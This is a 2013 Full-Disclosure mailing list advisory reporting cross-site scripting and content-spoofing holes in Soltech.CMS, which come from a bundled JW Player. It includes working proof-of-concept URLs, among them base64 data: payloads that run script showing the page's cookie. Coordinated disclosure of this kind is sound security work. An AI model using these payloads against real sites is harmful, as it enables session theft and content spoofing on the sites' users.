[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] XSS and CS vulnerability in Soltech.CMS
From: "MustLive" <mustlive () websecurity ! com ! ua>
Date: 2013-08-30 12:20:51
Message-ID: 004a01cea57b$76062e00$9b7a6fd5 () pc
[Download RAW message or body]
Hello list!
Earlier I wrote about SQL Injection vulnerability and these are new holes in
Soltech.CMS.
There are Cross-Site Scripting and Content Spoofing vulnerabilities in
Soltech.CMS. This is commercial CMS.
-------------------------
Affected products:
-------------------------
Vulnerable are Soltech.CMS v 0.4 and previous versions.
-------------------------
Affected vendors:
-------------------------
Soltech
http://soltech.com.ua
----------
Details:
----------
Vulnerable version JW Player 4.2.90 is used in the system.
Cross-Site Scripting (WASC-08):
http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/plugins/flashplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg
Content Spoofing (WASC-12):
http://site/plugins/flashplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/plugins/flashplayer/player.swf?file=1.flv&image=1.jpg
http://site/plugins/flashplayer/player.swf?config=1.xml
http://site/plugins/flashplayer/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua
------------
Timeline:
------------
2013.06.07 - informed developers about the first part of vulnerabilities.
2013.07.13 - announced at my site.
2013.07.14 - informed developers about the second part of vulnerabilities.
2013.08.27 - disclosed at my site (http://websecurity.com.ua/6653/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic